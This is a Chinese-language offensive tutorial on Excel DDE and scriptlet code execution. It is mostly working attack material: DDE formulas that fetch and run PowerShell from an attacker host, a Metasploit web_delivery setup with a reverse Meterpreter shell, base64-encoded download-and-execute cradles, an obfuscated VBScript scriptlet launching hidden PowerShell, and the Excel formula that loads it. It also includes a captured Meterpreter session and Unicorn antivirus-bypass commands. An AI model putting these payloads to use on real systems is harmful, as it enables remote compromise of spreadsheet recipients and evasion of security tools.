Execl Scriptlets Attack

凡是不能把我毁灭的,都将使我更强

0x00 基础

DDE可以通过Excel工作表公式执行任意命令,但是也有两个缺点.需要交互
1.启动时会提醒 启动内容
2.第二次打开时 更新内容

DDE通过进程通信.为了保证实时更新,允许从Excel内部调用应用程序,甚至可以通过Web请求将实时数据返回

而且可执行文件的名称和参数有一些长度限制,可能无法直接从DDE执行PowerShell.exe,但可以通过将PowerShell.exe作为参数传递给cmd.exe来完成此操作。这会将更多的字节添加到已经受限的1024字节参数长度中,1024是CreateProcess()函数的最大cmd长度。

1
2
3
4
5
6
7
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.base64\");powershell -e $e'!A1
解码后的脚本
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.ps1\");IEX $e'!A1
使用bat
=cmd|'/c \\evilserver.com\sp.bat;IEX $e'!A1

当然除了下面演示的反弹shell还有更多玩法
例如: 直接使用execl提权等等
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1

Youtube视频请翻墙,请关闭广告插件

0x01 MSF生成powershell脚本

原文地址:https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/

1
2
3
4
5
6
7
8
9
10
11
12
use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.2
set lport 22222
set srvhost 10.10.10.2
set target 2
set ssl true
run -j
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN');

0x02 特殊字符转换

注意:
powershell中base64编码用utf8转base64会执行失败

utf8 ————>>> base64 False
utf16-le ——>>> base64 True

bash
注意:这里我用的双引号和单引号请区分.上面payload中url是单引号,被我更改成双引号了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# echo '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring("https://10.10.10.2:8080/QpxuaN")' |iconv --to-code UTF-16LE|base64
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACIAKQAKAA
或者
先保存成payload.txt //记得换行
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$l=new-object net.webclient;
$l.proxy=[Net.WebRequest]::GetSystemWebProxy();
$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')
# cat payload.txt|iconv --to-code UTF-16LE|base64
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsACgAkAGwAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAJABsAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AAoAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsACgBJAEUAWAAgACQAbAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAMAAuADEAMAAuADEAMAAuADIAOgA4ADAAOAAwAC8AUQBwAHgAdQBhAE4AJwApAAoA

python

1
2
3
4
5
6
7
8
9
10
11
In [1]: import base64
In [2]: x = "[System.Net.ServicePointManager]::ServerCertificateValidationCallba
...: ck={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSys
...: temWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredent
...: ials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
In [3]: y = x.encode('UTF-16LE')
In [4]: base64.encode(y)
In [5]: base64.b64encode(y)
Out[5]: 'WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA='

powershell[1]

1
2
3
PS> (cmd /c echo {[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')}).split('')[1]
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA=

powershell[2]

1
2
3
4
5
6
PS> $command="[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
PS> $byte=[System.Text.Encoding]::Unicode.GetBytes($command)
PS> $encodecomand=[Convert]::ToBase64String($byte)
PS> echo $encodecomand
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7AFQAcgB1AGUAfQA7AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AEkARQBYACAALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA=

其他类型
https://github.com/danielbohannon/Invoke-Obfuscation
https://04z.net/2017/12/12/Powershell-Evasion/

0x03 将脚本内容保存到xml文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?XML version="1.0"?>
<scriptlet>
<registration
description="KH9uSJNGgLpeK"
progid="aLqKTT.ba9f0i"
version="1.0"
classid="{D77A5972-210E-4FD6-BC1E-6094A40A1025}" remotable="true">
</registration>
<script language="VBScript">
<![CDATA[
if not vLQ then
dim tZnIOJNSxlFdPBXvNMkpDqNa : DiM xZdwuEqRiLPWuENFURdUOisq : Set tZnIOJNSxlFdPBXvNMkpDqNa = creaTEobjEcT(StrReverse(ChrW(&H57)) & ChrW(&H53) & Chr(&H63) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H70)) & ChrW(&H54) & StrReverse(Chr(&H2E)) & StrReverse(Chr(&H53)) & Chr(&H48) & StrReverse(ChrW(&H65)) & ChrW(&H6C) & ChrW(&H4C)):xZdwuEqRiLPWuENFURdUOisq=" poWERSHelL.EXe -ex ByPAss -noP -W Hidden -Ec WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA= ":tZnIOJNSxlFdPBXvNMkpDqNa.rUn ChR(34)&tZnIOJNSxlFdPBXvNMkpDqNa.eXPaNDEnVIROnMENtStrinGs(StrReverse(ChrW(&H25)) & ChrW(&H43) & StrReverse(ChrW(&H4F)) & Chr(&H6D) & StrReverse(Chr(&H53)) & Chr(&H70) & StrReverse(ChrW(&H65)) & Chr(&H43) & StrReverse(ChrW(&H25)))&cHR(34)&CHR(34)&ChrW(&H2F) & StrReverse(Chr(&H43)) & Chr(&H20)&xZdwuEqRiLPWuENFURdUOisq&CHR(34),0:set tZnIOJNSxlFdPBXvNMkpDqNa = noThIng
end if
Function vLQ
Dim vFVw
Dim vdbGCrvsiz
Dim vUC
Set vFVw = GetObject("winmgmts:\\.\root\cimv2").ExecQuery(_
"Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
For Each vdbGCrvsiz in vFVw
If Instr(1,vdbGCrvsiz.CommandLine, WScript.ScriptName,1)> 0 Then
vUC = vUC + 1
End If
Next
vLQ = (vUC > 1)
End Function
]]>
</script>
</scriptlet>

0x04 使用python等开启http服务器

php -S 0.0.0.0:8081
python -m SimpleHTTPServer 8081
那么获取到x.xml的链接为http://10.10.10.2:8081/x.xml

0x05 新建一个execl.在任意处粘贴以下内容保存即可

=Package|'script:http://10.10.10.2:8081/x.xml'!''''

0x06 打开execl

记得允许启动内容.或者更新内容

1
2
3
4
5
6
7
[*] Sending stage (179779 bytes) to 10.10.10.27
[*] Meterpreter session 1 opened (10.10.10.2:22222 -> 10.10.10.27:49956) at 2017-12-19 20:45:30 +0800
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: X\evi1ox

0x07 彩蛋

使用Magic Unicorn —— Bypass AV

1
2
3
4
5
6
7
8
9
10
11
12
>>>kali_linux
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py --help
python unicorn.py windows/meterpreter/reverse_https cdn-01.example.com 443 macro
sudo msfconsole -r unicorn.rc
>>>windows
打开 powershell_attack.txt执行即可
当然这里powershell也可以植入execl中.规避一些waf及av
Youtube视频请翻墙,请关闭广告插件

http://staaldraad.github.io/2017/10/23/msword-field-codes/
http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1

本文为原创,转载请遵守本站的版本

更新于: 2018年5月24日 21:05